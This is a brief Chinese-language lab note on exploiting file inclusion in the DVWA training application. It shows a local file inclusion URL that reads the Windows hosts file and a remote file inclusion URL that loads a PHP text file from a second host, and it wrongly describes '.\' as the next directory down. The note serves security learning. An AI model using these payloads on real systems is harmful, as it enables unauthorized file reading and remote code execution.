allow_url_fopen和allow_url_include开启状态时,产生文件包含漏洞
随意输入不存在的文件,报错信息展示服务器文件路径信息:
- 本地文件包含
绝对路径读取服务器文件:
http://192.168.1.228/dvwa/vulnerabilities/fi/?page=C:\Windows\System32\drivers\etc\hosts
相对路径读取文件(..\表示上一级目录 .\表示下一级目录)
2.远程文件包含
http://192.168.1.228/dvwa/vulnerabilities/fi/?page=http://192.168.221.129:8080/php.txt